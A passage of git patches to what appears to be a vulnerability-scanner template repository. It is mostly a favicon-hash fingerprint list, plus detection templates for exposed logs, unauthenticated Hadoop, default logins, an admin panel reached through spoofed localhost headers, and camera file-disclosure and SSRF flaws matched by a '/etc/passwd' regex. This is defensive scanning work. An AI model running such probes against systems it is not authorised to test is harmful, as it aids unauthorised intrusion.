b/exposures/logs/wp-app-log.yaml @@ -4,6 +4,7 @@ info: name: Discover wp-app.log Files author: geeknik severity: info + tags: exposure,logs requests: - method: GET From 93a710982d8eca686d24c8fef2e6fa55b6104604 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 01:26:55 +0530 Subject: [PATCH 1123/4083] Update bedita-detect.yaml --- technologies/bedita-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/technologies/bedita-detect.yaml b/technologies/bedita-detect.yaml index 53f2a41514..fe6a5a8a6d 100644 --- a/technologies/bedita-detect.yaml +++ b/technologies/bedita-detect.yaml @@ -9,9 +9,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - matchers-condition: and matchers: - type: regex part: body From 3fc86268747e5242af01f3350c85e7cc51264c9c Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 01:33:02 +0530 Subject: [PATCH 1124/4083] Update hadoop-unauth.yaml --- misconfiguration/hadoop-unauth.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/misconfiguration/hadoop-unauth.yaml b/misconfiguration/hadoop-unauth.yaml index e47e947914..507e54a6f2 100644 --- a/misconfiguration/hadoop-unauth.yaml +++ b/misconfiguration/hadoop-unauth.yaml @@ -12,10 +12,14 @@ requests: - '{{BaseURL}}/ws/v1/cluster/info' - '{{BaseURL}}/ws/v1/cluster/apps/new-application' + matchers-condition: or matchers: - type: word words: - 'hadoopVersion' - 'resourceManagerVersionBuiltOn' - - 'javax.ws.rs.WebApplicationException' condition: and + + - type: word + words: + - 'javax.ws.rs.WebApplicationException' From 9eced649833e5e5b88d4864b37bf1dbf6d026b64 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 01:45:28 +0530 Subject: [PATCH 1125/4083] Update CVE-2007-0885.yaml --- cves/2007/CVE-2007-0885.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml index 252ec393c1..41811f9123 100644 --- a/cves/2007/CVE-2007-0885.yaml +++ b/cves/2007/CVE-2007-0885.yaml @@ -18,9 +18,11 @@ requests: - type: word words: - "\">" + - type: status status: - 200 + - type: word part: header words: From 09a5ea061ae66646413382bf400577063980365d Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 01:52:26 +0530 Subject: [PATCH 1126/4083] Update production-logs.yaml --- exposures/logs/production-logs.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/exposures/logs/production-logs.yaml b/exposures/logs/production-logs.yaml index 65db4e120d..b29f636b94 100644 --- a/exposures/logs/production-logs.yaml +++ b/exposures/logs/production-logs.yaml @@ -4,6 +4,7 @@ info: name: Discover production log files author: geeknik severity: info + tags: exposure,logs requests: - method: GET @@ -19,14 +20,17 @@ requests: - "Connecting to database specified by database.yml" - "Started GET" condition: and + + - type: status + status: + - 200 + - type: word part: header words: - "text/html" negative: true - - type: status - status: - - 200 + extractors: - type: regex name: last_modified From 3898e1df0180f731bdac026fc9733f5f804c1ba9 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 01:56:16 +0530 Subject: [PATCH 1127/4083] Update lutron-iot-default-login.yaml --- iot/lutron-iot-default-login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/iot/lutron-iot-default-login.yaml b/iot/lutron-iot-default-login.yaml index 71fd122838..8162cb26c0 100644 --- a/iot/lutron-iot-default-login.yaml +++ b/iot/lutron-iot-default-login.yaml @@ -5,6 +5,7 @@ info: reference: https://www.lutron.com author: geeknik severity: high + tags: iot,default-login,lutron requests: - method: GET @@ -19,10 +20,12 @@ requests: - ">DeviceIP" - ">Get Database Info as XML" condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 From f86c20edbd835d42a915003a4467195cf8d756cd Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 02:16:29 +0530 Subject: [PATCH 1128/4083] Update pagespeed-global-admin.yaml --- exposed-panels/pagespeed-global-admin.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposed-panels/pagespeed-global-admin.yaml b/exposed-panels/pagespeed-global-admin.yaml index 428cdce30a..bf020c0244 100644 --- a/exposed-panels/pagespeed-global-admin.yaml +++ b/exposed-panels/pagespeed-global-admin.yaml @@ -17,14 +17,17 @@ requests: X-Originating-IP: "127.0.0.1" X-Host: "127.0.0.1" X-Forwarded-Host: "127.0.0.1" + path: - "{{BaseURL}}/pagespeed-global-admin/" + matchers-condition: and matchers: - type: word words: - "X-Mod-Pagespeed" part: header + - type: status status: - 200 From 767e0d75d0e8039bad25ea26fa647198a30b06df Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 02:25:47 +0530 Subject: [PATCH 1129/4083] moving files around --- {vulnerabilities/other => iot}/targa-camera-lfi.yaml | 6 +++--- {vulnerabilities/other => iot}/targa-camera-ssrf.yaml | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) rename {vulnerabilities/other => iot}/targa-camera-lfi.yaml (93%) rename {vulnerabilities/other => iot}/targa-camera-ssrf.yaml (98%) diff --git a/vulnerabilities/other/targa-camera-lfi.yaml b/iot/targa-camera-lfi.yaml similarity index 93% rename from vulnerabilities/other/targa-camera-lfi.yaml rename to iot/targa-camera-lfi.yaml index e82bd25763..3a34d332ca 100644 --- a/vulnerabilities/other/targa-camera-lfi.yaml +++ b/iot/targa-camera-lfi.yaml @@ -6,7 +6,7 @@ info: severity: high description: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting in authentication bypass. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php - tags: targa,lfi + tags: targa,lfi,iot requests: - method: GET @@ -18,8 +18,8 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/vulnerabilities/other/targa-camera-ssrf.yaml b/iot/targa-camera-ssrf.yaml similarity index 98% rename from vulnerabilities/other/targa-camera-ssrf.yaml rename to iot/targa-camera-ssrf.yaml index 768d2a92d3..d62c5f6c25 100644 --- a/vulnerabilities/other/targa-camera-ssrf.yaml +++ b/iot/targa-camera-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: high description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php - tags: targa,ssrf,oob + tags: targa,ssrf,oob,iot requests: - raw: From 21b29e3339996bbb762e1de8c47b1335a58e4b9f Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 02:31:18 +0530 Subject: [PATCH 1130/4083] Update favicon-detection.yaml --- technologies/favicon-detection.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 9ad74f46c2..d337055062 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2037,10 +2037,10 @@ requests: dsl: - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))" - type: dsl - name: "Selea ANPR Camera" + name: "Selea-ANPR-Camera" dsl: - "status_code==200 && (\"-41369781\" == mmh3(base64_py(body)))" - type: dsl - name: "Selea CarPlateServer" + name: "Selea-CarPlateServer" dsl: - "status_code==200 && (\"-656528622\" == mmh3(base64_py(body)))" From e5c97aa2d752d56b8a0023de8966a0109f463896 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 02:34:41 +0530 Subject: [PATCH 1131/4083] easy to read --- technologies/favicon-detection.yaml | 507 ++++++++++++++++++++++++++++ 1 file changed, 507 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index d2040ee2bc..89726898b3 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -24,2026 +24,2533 @@ requests: name: proxmox dsl: - "len(body)==2336 && status_code==200 && (\"02f4db63a9cfb650c05ffd82956cbfd6\" == md5(body))" + - type: dsl name: blogger dsl: - "len(body)==3638 && status_code==200 && (\"59a0c7b6e4848ccdabcea0636efda02b\" == md5(body))" + - type: dsl name: oracle dsl: - "len(body)==1150 && status_code==200 && (\"421e176ae0837bcc6b879ef55adbc897\" == md5(body))" + - type: dsl name: hitachi dsl: - "len(body)==894 && status_code==200 && (\"41e9c43dc5e994ca7a40f4f92b50d01d\" == md5(body))" + - type: dsl name: meinberg dsl: - "len(body)==1406 && status_code==200 && (\"4b2524b4f28eac7d0e872b0e1323c02d\" == md5(body))" + - type: dsl name: "slack-instance" dsl: - "status_code==200 && (\"99395752\" == mmh3(base64_py(body)))" + - type: dsl name: "spring-boot" dsl: - "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))" + - type: dsl name: "jenkins" dsl: - "status_code==200 && (\"81586312\" == mmh3(base64_py(body)))" + - type: dsl name: "cnservers-llc" dsl: - "status_code==200 && (\"-235701012\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian" dsl: - "status_code==200 && (\"743365239\" == mmh3(base64_py(body)))" + - type: dsl name: "chainpoint" dsl: - "status_code==200 && (\"2128230701\" == mmh3(base64_py(body)))" + - type: dsl name: "lacie" dsl: - "status_code==200 && (\"-1277814690\" == mmh3(base64_py(body)))" + - type: dsl name: "parse" dsl: - "status_code==200 && (\"246145559\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian" dsl: - "status_code==200 && (\"628535358\" == mmh3(base64_py(body)))" + - type: dsl name: "jira" dsl: - "status_code==200 && (\"855273746\" == mmh3(base64_py(body)))" + - type: dsl name: "avigilon" dsl: - "status_code==200 && (\"1318124267\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian-confluence" dsl: - "status_code==200 && (\"-305179312\" == mmh3(base64_py(body)))" + - type: dsl name: "openstack" dsl: - "status_code==200 && (\"786533217\" == mmh3(base64_py(body)))" + - type: dsl name: "pi-star" dsl: - "status_code==200 && (\"432733105\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian" dsl: - "status_code==200 && (\"705143395\" == mmh3(base64_py(body)))" + - type: dsl name: "angular-io-angularjs" dsl: - "status_code==200 && (\"-1255347784\" == mmh3(base64_py(body)))" + - type: dsl name: "xampp" dsl: - "status_code==200 && (\"-1275226814\" == mmh3(base64_py(body)))" + - type: dsl name: "react" dsl: - "status_code==200 && (\"-2009722838\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian-jira" dsl: - "status_code==200 && (\"981867722\" == mmh3(base64_py(body)))" + - type: dsl name: "openstack" dsl: - "status_code==200 && (\"-923088984\" == mmh3(base64_py(body)))" + - type: dsl name: "aplikasi" dsl: - "status_code==200 && (\"494866796\" == mmh3(base64_py(body)))" + - type: dsl name: "ubiquiti-aircube" dsl: - "status_code==200 && (\"1249285083\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian-bamboo" dsl: - "status_code==200 && (\"-1379982221\" == mmh3(base64_py(body)))" + - type: dsl name: "exostar-managed-access-gateway" dsl: - "status_code==200 && (\"420473080\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian-confluence" dsl: - "status_code==200 && (\"-1642532491\" == mmh3(base64_py(body)))" + - type: dsl name: "cisco-meraki" dsl: - "status_code==200 && (\"163842882\" == mmh3(base64_py(body)))" + - type: dsl name: "archivematica" dsl: - "status_code==200 && (\"-1378182799\" == mmh3(base64_py(body)))" + - type: dsl name: "tcn" dsl: - "status_code==200 && (\"-702384832\" == mmh3(base64_py(body)))" + - type: dsl name: "cx" dsl: - "status_code==200 && (\"-532394952\" == mmh3(base64_py(body)))" + - type: dsl name: "ace" dsl: - "status_code==200 && (\"-183163807\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian-jira" dsl: - "status_code==200 && (\"552727997\" == mmh3(base64_py(body)))" + - type: dsl name: "netdata" dsl: - "status_code==200 && (\"1302486561\" == mmh3(base64_py(body)))" + - type: dsl name: "opengeo-suite" dsl: - "status_code==200 && (\"-609520537\" == mmh3(base64_py(body)))" + - type: dsl name: "dgraph-ratel" dsl: - "status_code==200 && (\"-1961046099\" == mmh3(base64_py(body)))" + - type: dsl name: "atlassian-jira" dsl: - "status_code==200 && (\"-1581907337\" == mmh3(base64_py(body)))" + - type: dsl name: "material-dashboard" dsl: - "status_code==200 && (\"1913538826\" == mmh3(base64_py(body)))" + - type: dsl name: "form.io" dsl: - "status_code==200 && (\"1319699698\" == mmh3(base64_py(body)))" + - type: dsl name: "kubeflow" dsl: - "status_code==200 && (\"-1203021870\" == mmh3(base64_py(body)))" + - type: dsl name: "netdata-dashboard" dsl: - "status_code==200 && (\"-182423204\" == mmh3(base64_py(body)))" + - type: dsl name: "caprover" dsl: - "status_code==200 && (\"988422585\" == mmh3(base64_py(body)))" + - type: dsl name: "wijungle" dsl: - "status_code==200 && (\"2113497004\" == mmh3(base64_py(body)))" + - type: dsl name: "onera" dsl: - "status_code==200 && (\"1234311970\" == mmh3(base64_py(body)))" + - type: dsl name: "smartping" dsl: - "status_code==200 && (\"430582574\" == mmh3(base64_py(body)))" + - type: dsl name: "openstack" dsl: - "status_code==200 && (\"1232596212\" == mmh3(base64_py(body)))" + - type: dsl name: "netdata-dashboard" dsl: - "status_code==200 && (\"1585145626\" == mmh3(base64_py(body)))" + - type: dsl name: "fritz!box" dsl: - "status_code==200 && (\"-219752612\" == mmh3(base64_py(body)))" + - type: dsl name: "ubiquiti-airos" dsl: - "status_code==200 && (\"-697231354\" == mmh3(base64_py(body)))" + - type: dsl name: "fortinet-forticlient" dsl: - "status_code==200 && (\"945408572\" == mmh3(base64_py(body)))" + - type: dsl name: "outlook-web-application" dsl: - "status_code==200 && (\"1768726119\" == mmh3(base64_py(body)))" + - type: dsl name: "huawei-claro" dsl: - "status_code==200 && (\"2109473187\" == mmh3(base64_py(body)))" + - type: dsl name: "asus-aicloud" dsl: - "status_code==200 && (\"552592949\" == mmh3(base64_py(body)))" + - type: dsl name: "sonicwall" dsl: - "status_code==200 && (\"631108382\" == mmh3(base64_py(body)))" + - type: dsl name: "google" dsl: - "status_code==200 && (\"708578229\" == mmh3(base64_py(body)))" + - type: dsl name: "plesk" dsl: - "status_code==200 && (\"-134375033\" == mmh3(base64_py(body)))" + - type: dsl name: "dahua-storm-ip-camera" dsl: - "status_code==200 && (\"2019488876\" == mmh3(base64_py(body)))" + - type: dsl name: "huawei-adsl/router" dsl: - "status_code==200 && (\"-1395400951\" == mmh3(base64_py(body)))" + - type: dsl name: "sophos-cyberoam-appliance" dsl: - "status_code==200 && (\"1601194732\" == mmh3(base64_py(body)))" + - type: dsl name: "lancom-systems" dsl: - "status_code==200 && (\"-325082670\" == mmh3(base64_py(body)))" + - type: dsl name: "plesk" dsl: - "status_code==200 && (\"-1050786453\" == mmh3(base64_py(body)))" + - type: dsl name: "tilginab-homegateway" dsl: - "status_code==200 && (\"-1346447358\" == mmh3(base64_py(body)))" + - type: dsl name: "supermicro-intelligent-management-ipmi" dsl: - "status_code==200 && (\"1410610129\" == mmh3(base64_py(body)))" + - type: dsl name: "zyxel-zywall" dsl: - "status_code==200 && (\"-440644339\" == mmh3(base64_py(body)))" + - type: dsl name: "dell-sonicwall" dsl: - "status_code==200 && (\"363324987\" == mmh3(base64_py(body)))" + - type: dsl name: "ubiquiti-login-portals" dsl: - "status_code==200 && (\"-1446794564\" == mmh3(base64_py(body)))" + - type: dsl name: "sophos-user-portal/vpn-portal" dsl: - "status_code==200 && (\"1045696447\" == mmh3(base64_py(body)))" + - type: dsl name: "apache-tomcat" dsl: - "status_code==200 && (\"-297069493\" == mmh3(base64_py(body)))" + - type: dsl name: "openvpn" dsl: - "status_code==200 && (\"396533629\" == mmh3(base64_py(body)))" + - type: dsl name: "cyberoam" dsl: - "status_code==200 && (\"1462981117\" == mmh3(base64_py(body)))" + - type: dsl name: "asp.net-favicon" dsl: - "status_code==200 && (\"1772087922\" == mmh3(base64_py(body)))" + - type: dsl name: "technicolor" dsl: - "status_code==200 && (\"1594377337\" == mmh3(base64_py(body)))" + - type: dsl name: "vodafone-technicolor" dsl: - "status_code==200 && (\"165976831\" == mmh3(base64_py(body)))" + - type: dsl name: "ubnt-router-ui" dsl: - "status_code==200 && (\"-1677255344\" == mmh3(base64_py(body)))" + - type: dsl name: "intelbras-wireless" dsl: - "status_code==200 && (\"-359621743\" == mmh3(base64_py(body)))" + - type: dsl name: "kerio-connect-webmail" dsl: - "status_code==200 && (\"-677167908\" == mmh3(base64_py(body)))" + - type: dsl name: "big-ip" dsl: - "status_code==200 && (\"878647854\" == mmh3(base64_py(body)))" + - type: dsl name: "microsoft-owa" dsl: - "status_code==200 && (\"442749392\" == mmh3(base64_py(body)))" + - type: dsl name: "pfsense" dsl: - "status_code==200 && (\"1405460984\" == mmh3(base64_py(body)))" + - type: dsl name: "ikuai-networks" dsl: - "status_code==200 && (\"-271448102\" == mmh3(base64_py(body)))" + - type: dsl name: "dlink-webcam" dsl: - "status_code==200 && (\"31972968\" == mmh3(base64_py(body)))" + - type: dsl name: "3cx-phone-system" dsl: - "status_code==200 && (\"970132176\" == mmh3(base64_py(body)))" + - type: dsl name: "bluehost" dsl: - "status_code==200 && (\"-1119613926\" == mmh3(base64_py(body)))" + - type: dsl name: "sangfor" dsl: - "status_code==200 && (\"123821839\" == mmh3(base64_py(body)))" + - type: dsl name: "zte-corporation-gateway/appliance" dsl: - "status_code==200 && (\"459900502\" == mmh3(base64_py(body)))" + - type: dsl name: "ruckus-wireless" dsl: - "status_code==200 && (\"-2069844696\" == mmh3(base64_py(body)))" + - type: dsl name: "bitnami" dsl: - "status_code==200 && (\"-1607644090\" == mmh3(base64_py(body)))" + - type: dsl name: "juniper-device-manager" dsl: - "status_code==200 && (\"2141724739\" == mmh3(base64_py(body)))" + - type: dsl name: "technicolor-gateway" dsl: - "status_code==200 && (\"1835479497\" == mmh3(base64_py(body)))" + - type: dsl name: "gitlab" dsl: - "status_code==200 && (\"1278323681\" == mmh3(base64_py(body)))" + - type: dsl name: "netasq---secure-/-stormshield" dsl: - "status_code==200 && (\"-1929912510\" == mmh3(base64_py(body)))" + - type: dsl name: "vmware-horizon" dsl: - "status_code==200 && (\"-1255992602\" == mmh3(base64_py(body)))" + - type: dsl name: "vmware-horizon" dsl: - "status_code==200 && (\"1895360511\" == mmh3(base64_py(body)))" + - type: dsl name: "vmware-horizon" dsl: - "status_code==200 && (\"-991123252\" == mmh3(base64_py(body)))" + - type: dsl name: "vmware-secure-file-transfer" dsl: - "status_code==200 && (\"1642701741\" == mmh3(base64_py(body)))" + - type: dsl name: "sap-netweaver" dsl: - "status_code==200 && (\"-266008933\" == mmh3(base64_py(body)))" + - type: dsl name: "sap-id-service" dsl: - "status_code==200 && (\"-1967743928\" == mmh3(base64_py(body)))" + - type: dsl name: "sap-conversational-ai" dsl: - "status_code==200 && (\"1347937389\" == mmh3(base64_py(body)))" + - type: dsl name: "palo-alto-login-portal" dsl: - "status_code==200 && (\"602431586\" == mmh3(base64_py(body)))" + - type: dsl name: "palo-alto-networks" dsl: - "status_code==200 && (\"-318947884\" == mmh3(base64_py(body)))" + - type: dsl name: "outlook-web-application" dsl: - "status_code==200 && (\"1356662359\" == mmh3(base64_py(body)))" + - type: dsl name: "webmin" dsl: - "status_code==200 && (\"1453890729\" == mmh3(base64_py(body)))" + - type: dsl name: "docker" dsl: - "status_code==200 && (\"-1814887000\" == mmh3(base64_py(body)))" + - type: dsl name: "docker" dsl: - "status_code==200 && (\"1937209448\" == mmh3(base64_py(body)))" + - type: dsl name: "amazon" dsl: - "status_code==200 && (\"-1544605732\" == mmh3(base64_py(body)))" + - type: dsl name: "amazon" dsl: - "status_code==200 && (\"716989053\" == mmh3(base64_py(body)))" + - type: dsl name: "phpmyadmin" dsl: - "status_code==200 && (\"-1010568750\" == mmh3(base64_py(body)))" + - type: dsl name: "zhejiang-uniview-technologies-co." dsl: - "status_code==200 && (\"-1240222446\" == mmh3(base64_py(body)))" + - type: dsl name: "isp-manager" dsl: - "status_code==200 && (\"-986678507\" == mmh3(base64_py(body)))" + - type: dsl name: "axis-network-cameras" dsl: - "status_code==200 && (\"-1616143106\" == mmh3(base64_py(body)))" + - type: dsl name: "roundcube-webmail" dsl: - "status_code==200 && (\"-976235259\" == mmh3(base64_py(body)))" + - type: dsl name: "unifi-video-controller-airvision" dsl: - "status_code==200 && (\"768816037\" == mmh3(base64_py(body)))" + - type: dsl name: "pfsense" dsl: - "status_code==200 && (\"1015545776\" == mmh3(base64_py(body)))" + - type: dsl name: "freebox-os" dsl: - "status_code==200 && (\"1838417872\" == mmh3(base64_py(body)))" + - type: dsl name: "hxxps" dsl: - "status_code==200 && (\"1188645141\" == mmh3(base64_py(body)))" + - type: dsl name: "keenetic" dsl: - "status_code==200 && (\"547282364\" == mmh3(base64_py(body)))" + - type: dsl name: "sierra-wireless-ace-manager-airlink" dsl: - "status_code==200 && (\"-1571472432\" == mmh3(base64_py(body)))" + - type: dsl name: "synology-diskstation" dsl: - "status_code==200 && (\"149371702\" == mmh3(base64_py(body)))" + - type: dsl name: "instar-ip-cameras" dsl: - "status_code==200 && (\"-1169314298\" == mmh3(base64_py(body)))" + - type: dsl name: "webmin" dsl: - "status_code==200 && (\"-1038557304\" == mmh3(base64_py(body)))" + - type: dsl name: "octoprint-3d-printer" dsl: - "status_code==200 && (\"1307375944\" == mmh3(base64_py(body)))" + - type: dsl name: "webmin" dsl: - "status_code==200 && (\"1280907310\" == mmh3(base64_py(body)))" + - type: dsl name: "vesta-hosting-control-panel" dsl: - "status_code==200 && (\"1954835352\" == mmh3(base64_py(body)))" + - type: dsl name: "farming-simulator-dedicated-server" dsl: - "status_code==200 && (\"509789953\" == mmh3(base64_py(body)))" + - type: dsl name: "residential-gateway" dsl: - "status_code==200 && (\"-1933493443\" == mmh3(base64_py(body)))" + - type: dsl name: "cpanel-login" dsl: - "status_code==200 && (\"1993518473\" == mmh3(base64_py(body)))" + - type: dsl name: "arris" dsl: - "status_code==200 && (\"-1477563858\" == mmh3(base64_py(body)))" + - type: dsl name: "plex-server" dsl: - "status_code==200 && (\"-895890586\" == mmh3(base64_py(body)))" + - type: dsl name: "dlink-webcam" dsl: - "status_code==200 && (\"-1354933624\" == mmh3(base64_py(body)))" + - type: dsl name: "deluge" dsl: - "status_code==200 && (\"944969688\" == mmh3(base64_py(body)))" + - type: dsl name: "webmin" dsl: - "status_code==200 && (\"479413330\" == mmh3(base64_py(body)))" + - type: dsl name: "cambium-networks" dsl: - "status_code==200 && (\"-435817905\" == mmh3(base64_py(body)))" + - type: dsl name: "plesk" dsl: - "status_code==200 && (\"-981606721\" == mmh3(base64_py(body)))" + - type: dsl name: "dahua-storm-ip-camera" dsl: - "status_code==200 && (\"833190513\" == mmh3(base64_py(body)))" + - type: dsl name: "10" dsl: - "status_code==200 && (\"-1314864135\" == mmh3(base64_py(body)))" + - type: dsl name: "parallels-plesk-panel" dsl: - "status_code==200 && (\"-652508439\" == mmh3(base64_py(body)))" + - type: dsl name: "fireware-watchguard" dsl: - "status_code==200 && (\"-569941107\" == mmh3(base64_py(body)))" + - type: dsl name: "shock&innovation!!-netis-setup" dsl: - "status_code==200 && (\"1326164945\" == mmh3(base64_py(body)))" + - type: dsl name: "cacaoweb" dsl: - "status_code==200 && (\"-1738184811\" == mmh3(base64_py(body)))" + - type: dsl name: "loxone-automation" dsl: - "status_code==200 && (\"904434662\" == mmh3(base64_py(body)))" + - type: dsl name: "hp-printer/server" dsl: - "status_code==200 && (\"905744673\" == mmh3(base64_py(body)))" + - type: dsl name: "netflix" dsl: - "status_code==200 && (\"902521196\" == mmh3(base64_py(body)))" + - type: dsl name: "linksys-smart-wi-fi" dsl: - "status_code==200 && (\"-2063036701\" == mmh3(base64_py(body)))" + - type: dsl name: "lwip-a-lightweight-tcp/ip-stack" dsl: - "status_code==200 && (\"-1205024243\" == mmh3(base64_py(body)))" + - type: dsl name: "hitron-technologies" dsl: - "status_code==200 && (\"607846949\" == mmh3(base64_py(body)))" + - type: dsl name: "dahua-storm-dvr" dsl: - "status_code==200 && (\"1281253102\" == mmh3(base64_py(body)))" + - type: dsl name: "mobotix-camera" dsl: - "status_code==200 && (\"661332347\" == mmh3(base64_py(body)))" + - type: dsl name: "blue-iris-webcam" dsl: - "status_code==200 && (\"-520888198\" == mmh3(base64_py(body)))" + - type: dsl name: "vigor-router" dsl: - "status_code==200 && (\"104189364\" == mmh3(base64_py(body)))" + - type: dsl name: "alibaba-cloud-block-page" dsl: - "status_code==200 && (\"1227052603\" == mmh3(base64_py(body)))" + - type: dsl name: "dd-wrt-dd-wrt-milli_httpd" dsl: - "status_code==200 && (\"252728887\" == mmh3(base64_py(body)))" + - type: dsl name: "mitel-networks-micollab-end-user-portal" dsl: - "status_code==200 && (\"-1922044295\" == mmh3(base64_py(body)))" + - type: dsl name: "dlink-webcam" dsl: - "status_code==200 && (\"1221759509\" == mmh3(base64_py(body)))" + - type: dsl name: "dlink-router" dsl: - "status_code==200 && (\"1037387972\" == mmh3(base64_py(body)))" + - type: dsl name: "prtg-network-monitor" dsl: - "status_code==200 && (\"-655683626\" == mmh3(base64_py(body)))" + - type: dsl name: "elastic-database" dsl: - "status_code==200 && (\"1611729805\" == mmh3(base64_py(body)))" + - type: dsl name: "dlink-webcam" dsl: - "status_code==200 && (\"1144925962\" == mmh3(base64_py(body)))" + - type: dsl name: "wildfly" dsl: - "status_code==200 && (\"-1666561833\" == mmh3(base64_py(body)))" + - type: dsl name: "cisco-meraki-dashboard" dsl: - "status_code==200 && (\"804949239\" == mmh3(base64_py(body)))" + - type: dsl name: "workday" dsl: - "status_code==200 && (\"-459291760\" == mmh3(base64_py(body)))" + - type: dsl name: "justhost" dsl: - "status_code==200 && (\"1734609466\" == mmh3(base64_py(body)))" + - type: dsl name: "baidu-ip-error-page" dsl: - "status_code==200 && (\"-1507567067\" == mmh3(base64_py(body)))" + - type: dsl name: "intelbras-sa" dsl: - "status_code==200 && (\"2006716043\" == mmh3(base64_py(body)))" + - type: dsl name: "yii-php-framework-default-favicon" dsl: - "status_code==200 && (\"-1298108480\" == mmh3(base64_py(body)))" + - type: dsl name: "truvision-nvr-interlogix" dsl: - "status_code==200 && (\"1782271534\" == mmh3(base64_py(body)))" + - type: dsl name: "redmine" dsl: - "status_code==200 && (\"603314\" == mmh3(base64_py(body)))" + - type: dsl name: "phpmyadmin" dsl: - "status_code==200 && (\"-476231906\" == mmh3(base64_py(body)))" + - type: dsl name: "cisco-eg" dsl: - "status_code==200 && (\"-646322113\" == mmh3(base64_py(body)))" + - type: dsl name: "jetty-404" dsl: - "status_code==200 && (\"-629047854\" == mmh3(base64_py(body)))" + - type: dsl name: "luma-surveillance" dsl: - "status_code==200 && (\"-1351901211\" == mmh3(base64_py(body)))" + - type: dsl name: "parallels-plesk-panel" dsl: - "status_code==200 && (\"-519765377\" == mmh3(base64_py(body)))" + - type: dsl name: "hp-printer-/-server" dsl: - "status_code==200 && (\"-2144363468\" == mmh3(base64_py(body)))" + - type: dsl name: "metasploit" dsl: - "status_code==200 && (\"-127886975\" == mmh3(base64_py(body)))" + - type: dsl name: "metasploit" dsl: - "status_code==200 && (\"1139788073\" == mmh3(base64_py(body)))" + - type: dsl name: "metasploit" dsl: - "status_code==200 && (\"-1235192469\" == mmh3(base64_py(body)))" + - type: dsl name: "alibi-nvr" dsl: - "status_code==200 && (\"1876585825\" == mmh3(base64_py(body)))" + - type: dsl name: "sangfor" dsl: - "status_code==200 && (\"-1810847295\" == mmh3(base64_py(body)))" + - type: dsl name: "websockets-test-page-eg" dsl: - "status_code==200 && (\"-291579889\" == mmh3(base64_py(body)))" + - type: dsl name: "macos-server-apple" dsl: - "status_code==200 && (\"1629518721\" == mmh3(base64_py(body)))" + - type: dsl name: "openrg" dsl: - "status_code==200 && (\"-986816620\" == mmh3(base64_py(body)))" + - type: dsl name: "cisco-router" dsl: - "status_code==200 && (\"-299287097\" == mmh3(base64_py(body)))" + - type: dsl name: "sangfor" dsl: - "status_code==200 && (\"-1926484046\" == mmh3(base64_py(body)))" + - type: dsl name: "herospeed-digital-technology-co.-nvr/ipc/xvr" dsl: - "status_code==200 && (\"-873627015\" == mmh3(base64_py(body)))" + - type: dsl name: "nomadix-access-gateway" dsl: - "status_code==200 && (\"2071993228\" == mmh3(base64_py(body)))" + - type: dsl name: "gitlab" dsl: - "status_code==200 && (\"516963061\" == mmh3(base64_py(body)))" + - type: dsl name: "magento" dsl: - "status_code==200 && (\"-38580010\" == mmh3(base64_py(body)))" + - type: dsl name: "mk-auth" dsl: - "status_code==200 && (\"1490343308\" == mmh3(base64_py(body)))" + - type: dsl name: "shoutcast-server" dsl: - "status_code==200 && (\"-632583950\" == mmh3(base64_py(body)))" + - type: dsl name: "fireeye" dsl: - "status_code==200 && (\"95271369\" == mmh3(base64_py(body)))" + - type: dsl name: "fireeye" dsl: - "status_code==200 && (\"1476335317\" == mmh3(base64_py(body)))" + - type: dsl name: "fireeye" dsl: - "status_code==200 && 